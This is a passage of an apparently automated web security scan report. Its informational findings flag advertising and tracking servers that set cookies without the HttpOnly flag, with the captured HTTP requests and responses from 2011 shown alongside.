GET /js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:58 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a50-24016-868327107-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad68:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:58 GMT
Pragma: no-cache
Content-Length: 1850
Content-Type: application/x-javascript

document.write('<a target=\"_blank\" href=\"http://ads.cnn.com/event.ng/Type=click&FlightID=349542&AdID=480643&TargetID=108366&Segments=2168,2743,13085,13087,13088,13090,13305,17251,18904,18907,18910,
...[SNIP]...

13.65. http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a52-16561-1098652450-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:57 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a52-16561-1098652450-1; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad71:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:57 GMT
Pragma: no-cache
Content-Length: 1530
Content-Type: application/x-javascript

document.write('<img src=\"http://i.cdn.turner.com/nba/nba/nba_adspaces/1.0/creatives/2011/2/18/48379hooptroop.300.jpg\" border=\"0\" width=\"300\" height=\"250\" alt=\"NBA Hoop Troop\" usemap=\"#hoop
...[SNIP]...

13.66. http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a55-10071-735555943-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962852541992&transactionID=1307962852541992 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:56 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a55-10071-735555943-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad68:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:56 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n\n\n</body>\n</html>');

13.67. http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.nba.com
Path:	/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NGUserID=a3d0a50-31461-1375599509-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853739702&transactionID=1307962853739702 HTTP/1.1
Host: ads.nba.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:00:56 GMT
Server: Apache
Set-Cookie: NGUserID=a3d0a50-31461-1375599509-2; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: ads1ad71:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 13 Jun 2011 11:00:56 GMT
Pragma: no-cache
Content-Length: 166
Content-Type: application/x-javascript

document.write('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n<html>\n<body style=\"margin: 0px;\">\n\n\n</body>\n</html>');

13.68. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_7v5P="MLsXtSMNJjhvJZGoecXcxPALFPJgPeBnRLSIC5seAoMV0MlXC83mglpihGJj4llhxoQ3e1svCK+Nxl8qmHgwn/tk5yhz0s6gMqepbcTRCTVKOXsG3B4jg4jRNKkMEO8YvDy8XQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsChIEd+PvSVJnpZZitSz0giLAQhMw4bcMP/b5clIE0lk3/0/oNfGYUVyhJYTYKNqdC04jLXj6sg+6cttG5YhAKNaCzpytY2MD7XsGaLOIsKygBOypHF39kCZifEKvoW0Eyb0XpTtKUZvtijmrfYu4Y+OLOp9bwC/g+sEvqdQ7YBDQq2A4My2funJ12sn+7tZG4H6XJo0VgWp/utobRa0NDjGHRtx7x97JW3JoToRv6HeinKdm77VZc7/yBIEFc6+zL9U8yBMSC5qVJC6BmiCG3p1SP2y4sHRxAy34q9Ecsje+TSUOlpFyMBjMnUYT9/hOFsuCRe2vIQrZ5MSqhLPFIxTJvTaBW1KsX1pOUiAWYGS9pksSD4scIDCtx1JyUgOXoGvION+/YfK0snXNBYv3KM8jG93xv9oHY1DaVTBZWZUssM+HRZUtOooU4xm712Uv/Fz3qUnKMSbHqOCpozPFi2MM3ygrH5yaW/Wz9IAwinylx9hP5pJbdqGtVjwmvBpPo3f7li7jIYCPkCzf4DFfN4BbrrOaH1z+toDcALcyin2/Q2cxY8iyzWLLJ9h48jZE6PisUhkH3lMEb8B0oggg4PEHMi/kiIvDrK7kWYVD6l0KBiEFiPW8liklgMJWMgzQ5SA5NXW1yezXNgckLfqNAJ0XcoFh7/KBIGgvT3Pw9moJyLBRKBUPnteLPQ5kzQHE3L2yXzjv94K2/wytxjkPcQo3BfhAidL4HSD8p8ufsoo976t1Mi4JZ4LSgrIVdcXnfqmKBCmEhMq27EmYxqXGBw6lV6BGQUGb18jiP8bLSf1Z6X9u8kyvCGssYXxZT5Aroz64zbC/oaSXuwzdkSV2LtW0RQkqRIEf+Y2xMd4xUxPqiA9JeqH7iPQQsD1KNmwPAfeki9x4iJttcZcvV7yiwVBEEc0eNbqloKy1cK1IBKakMsK8MXb+G/idjMKFm8y6mYrfO2jOzDfNLd7yjJHDGgKaKqZ9jhxo2x9wGOP0UD1LujJZmTv3h1Hl9d9CZdKyaiILPu2rwJA7li6Yu2q0yffEFIhCP69U6/zuFt/hP4kb+cUdsL0KrdaqpJJZYF6m7GM6Y4fy5vS94WLytkb+PiS9/NMjNC69jbzzThAKHk04he9cu13oXmuVQJ0ZgL4WoDnrHgd7ttEbIWlAIt39YJlj7Cy/qXncpZo5IyRsA=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUM1IymnMBYY1A2AKVvIImQRK15PG0ZG8xXiy/jjLaAD3cFM0ipXTUHNBmbDd46t2hFxDCMVaHOYllruChPtX9lmoTB4XTp0MTGlRu7VZ6iPaAiSltSt2n1OgbZyFHS488sOo/WhmpOJJdWIC1K0s80FLO15A2FkUVNzDncLH0dcICW/dcxrzfg7YbyAtEmGLqJjJW1YrsXnMK+8Dhb69Do4jhq6oG41IZqAXDdfUZHNnM88F9wL4iaqAraeydL95l0FPnuO7bNXKn5o5StH+jn+w8XqpWQrG6yeq7rXIJxP4CNtFkTqE5r7kU5vouYl44epaLpLfOq+Kb/sCo+gXcEyYD79pUDOBTdpb5Uh1efWnc1B5EgxmFKfdAKvtDLQ29mkG4JbhtIudkyPO73WA/syaBwDa32I4/prXd+FUBwL1Jw0FxazxyTvN18HOldmtcT4pB3kb6LwczuCpT/ahyrZfTzJ64rl2UDtE7pN8BL3zRkB4rMdQontLuqe7dUprOx7ROmerdYAFdCinwH2eKIE2BOKwyzEgfCVs67btvX7XMw2UZA4nqCGXBqXiZ73rpXk51jkGvYtqqjvy0JT3ELSHVUYsk4dOdiiw9CEcmwldalBOtKuvA72v5XZdzNsCA8wmwhD4SthVu1G8H0be93VnunUNYXBjxDpEsYPMzIcENJPlnhMfhlUhH7A7ED9cdH3GBYv5f5PaBjHG3j0pDTuM+o1gYPyxc6bFXpl55vMMSYqvkp0Cdej0KcVQ1WLoY6TZ/j6CAeQ/PQCPxQcz1D+oT54shoq7Ree+ekhbBl5CnD0F9kvAmAerYc3Ms6ILpvA6xV9PPcS+Nitzn86w83YgY3uqd2MqADtKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8JoURZOCjqiH855mK3sqrup8s9L575P6sOCuy0uqcB937sPRkk8WeCl1IEoqw1kq/Ilu2l8ir8L+96BxhzjjJPPIXONJv/yfSSTUueIht95Jv91sOFK+nJGXCTUII2fRJ711dwf9AIOLEAaquHaGPrTWpbOQ0HGtSP7yfNv0XXGDw6ajlb0l+l8bB/mvXv2SILU062vN9JM++YOvmd1hzjtNzhi3UjFJz/IFIgCZBs/BVubNMD9uYYbH6TxxjH+7CdSdlo4qYUX31T6EyVGh01Pxz1+fLgG4rhsPKzVPOXvo3kh/6RpWvM0ajQiSoWnBT5aRMuggA4X8pGS2MZIa+hiIDWj/YvAx1LfX+MgoUN9yvHTPBBw6bSIHKNHg6IgIDZ1cuo2xRfbcsahrLCJLUVylUKNJ1/SIR5UJUrbYWaTldI+BcE61OrZUBx12U2DD79VKGzzuDCa9L37Nah53PjStfRX50kC7FkaKN3VY+yzg9/8KqmKE3sDAPbMDW+EyKUDXqHMGqwMCtQSZ12dEEBu5jvmyS19dxP1JTvnRi0xGBcgfwTwvKoY4i9H3dR+qMN7KKTtNtyA3E0omvuepmPaAullSzXZGTDH70dhHLfWM+MR/VcxVNcs4vflK3QEr/94glwixB8mAR8HTbXIM0pOiIcMuzHzOzyPDvR0j2kSHzYEhjo+gzBKwyojKn5LmUx38X30QJ8HlVJ89wvbdE5kPBDOzM1/YnsetfeVgnrUI83ES6N9UeIBfG0caxdSfg2QNj5SN1Inel3N9oTRHpDrjPcIU4e8nSLjr4NUekYAAtLR/4djBPHM+6YgGS49215SR0yEYUAgbeZySxstQNac2aRaGvSDnSiaV3D"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.69. http://ads.undertone.com/f previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

UTID=4fa40dc9ea734290be23eabae06b7886; expires=Tue, 12-Jun-2012 11:21:24 GMT; path=/
UTPROFILES=15138%2312%3A28%7C22%3A25%2C7_24%2C39%7C23%3A25%2C7_24%2C39%7C259%3A10%2C7%7C303%3A25%7C845%3A28_25_24%2C7%7C1022%3A28_25%2C7_24%2C34%7C1023%3A28_25%2C7_24%2C35%7C1194%3A18%7C1671%3A23_22%2C2%7C2764%3A28%7C2817%3A18%7C2829%3A18%7C2837%3A18%7C2839%3A18%7C2847%3A18%7C2849%3A18%7C2851%3A18%7C2853%3A18%7C2855%3A18%7C2857%3A18%7C2859%3A18%7C2861%3A18%7C2863%3A18%7C2865%3A18%7C2976%3A10%7C2977%3A28%7C2978%3A29%2C2%7C3080%3A1%2C2; expires=Sun, 11-Sep-2011 11:21:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /f?pid=3080&cb=32b5bad5-a03a-48c8-ac79-614d3b60db5d HTTP/1.1
Host: ads.undertone.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=5360&cb=e2781b91d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A28X=307zebb-b1QUXddD4pjkVkkW7Ot8EpeSQfRz936GxIjkkxdzbY_uM6Q; __qca=P0-523485369-1305927820140; UTLIA=209452.llcw5o-14493_209454.llcw5n-13753_205196.lljpe6-4837; _UTLIA[205196]=lljpij-4837; UTID=4fa40dc9ea734290be23eabae06b7886; UTPROFILES=15129%2312%3A19%7C22%3A16%2C7_15%2C39%7C23%3A16%2C7_15%2C39%7C259%3A1%2C7%7C303%3A16%7C845%3A19_16_15%2C7%7C1022%3A19_16%2C7_15%2C34%7C1023%3A19_16%2C7_15%2C35%7C1194%3A9%7C1671%3A14_13%2C2%7C2764%3A19%7C2817%3A9%7C2829%3A9%7C2837%3A9%7C2839%3A9%7C2847%3A9%7C2849%3A9%7C2851%3A9%7C2853%3A9%7C2855%3A9%7C2857%3A9%7C2859%3A9%7C2861%3A9%7C2863%3A9%7C2865%3A9%7C2976%3A1%7C2977%3A19%7C2978%3A20%2C2

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSDo OUR BUS UNI COM NAV"
Content-Length: 43
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:21:24 GMT
Connection: close
Set-Cookie: UTID=4fa40dc9ea734290be23eabae06b7886; expires=Tue, 12-Jun-2012 11:21:24 GMT; path=/
Set-Cookie: UTPROFILES=15138%2312%3A28%7C22%3A25%2C7_24%2C39%7C23%3A25%2C7_24%2C39%7C259%3A10%2C7%7C303%3A25%7C845%3A28_25_24%2C7%7C1022%3A28_25%2C7_24%2C34%7C1023%3A28_25%2C7_24%2C35%7C1194%3A18%7C1671%3A23_22%2C2%7C2764%3A28%7C2817%3A18%7C2829%3A18%7C2837%3A18%7C2839%3A18%7C2847%3A18%7C2849%3A18%7C2851%3A18%7C2853%3A18%7C2855%3A18%7C2857%3A18%7C2859%3A18%7C2861%3A18%7C2863%3A18%7C2865%3A18%7C2976%3A10%7C2977%3A28%7C2978%3A29%2C2%7C3080%3A1%2C2; expires=Sun, 11-Sep-2011 11:21:24 GMT; path=/

GIF89a.............!.......,...........D..;

13.70. http://ak1.abmr.net/is/adopt.imiclk.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/adopt.imiclk.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-6EB1E973CC529A6728E8A773F0CBB70108F6AB411B744A10E247D03071ADCC6B-0DF6FF1A98FE5F3223B958FB56F9E60ED8D0A95886E80532BD5FA1E74AF8C478; expires=Tue, 12-Jun-2012 11:03:14 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.71. http://ak1.abmr.net/is/tag.admeld.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/tag.admeld.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-C962F508BE5AF06FD18AC05E8D5BBA6BCEF86873CF07F773BC88A059DC559C10-2AFA78C53CBD1FAEA308969CDD72466CA774E2FA1ADE86BF658712314425319E; expires=Tue, 12-Jun-2012 11:01:31 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.72. http://ak1.abmr.net/is/www.burstnet.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/www.burstnet.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

01AI=2-2-50C2793544FFA367044F9A6B21804409E0D0C42CDB25AA399A75BA32C42D4A42-5A998D7C2BD1F1ABB965917E90382B2E8C022E108555454D21859560421ED2FB; expires=Tue, 12-Jun-2012 11:21:27 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.73. http://altfarm.mediaplex.com/ad/js/12309-129868-23636-1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/12309-129868-23636-1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mojo3=12309:23636/12760:2414/17038:20406/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158; expires=Thu, 13-Jun-2013 5:17:30 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.74. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17038-128465-20406-11

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mojo3=17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158; expires=Thu, 13-Jun-2013 5:24:04 GMT; path=/; domain=.mediaplex.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17038:20406/12309:23636/9966:1105/17550:1884/15017:13113/14302:40017/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158; expires=Thu, 13-Jun-2013 5:24:04 GMT; path=/; domain=.mediaplex.com;
Location: http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-20406-11%3Fmpt%3D4df5f0d4b6b72&mpt=4df5f0d4b6b72&mpvc=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9
Content-Length: 0
Date: Mon, 13 Jun 2011 11:13:28 GMT

13.75. http://amch.questionmarket.com/adsc/d724925/2/725047/adscout.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d724925/2/725047/adscout.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Sun, 13-Jun-2010 11:10:48 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2; expires=Fri, 03-Aug-2012 03:10:49 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-06; expires=Fri, 03-Aug-2012 03:10:49 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.76. http://amch.questionmarket.com/adsc/d888315/39/500005401531/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d888315/39/500005401531/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Sun, 13 Jun 2010 11:22:51 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-2; expires=Fri, 03 Aug 2012 03:22:52 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-E3; expires=Fri, 03-Aug-2012 03:22:52 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.77. http://amch.questionmarket.com/adsc/d893515/8/41197792/decide.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adsc/d893515/8/41197792/decide.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CS1=deleted; expires=Sun, 13 Jun 2010 11:34:31 GMT; path=/; domain=.questionmarket.com
CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-2; expires=Fri, 03 Aug 2012 03:34:32 GMT; path=/; domain=.questionmarket.com
ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-2; expires=Fri, 03-Aug-2012 03:34:32 GMT; path=/; domain=.questionmarket.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.78. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0Wm24107qgSVExkNK7HUtFp4B4dlWpgdhN4mIk5QrdBD8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvpyipewHlOhwIG1G4rZ9utJNJRFsRyXovJWz7fUPpX3ydWr1XIQIIGVXmipwPmwHj2LBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

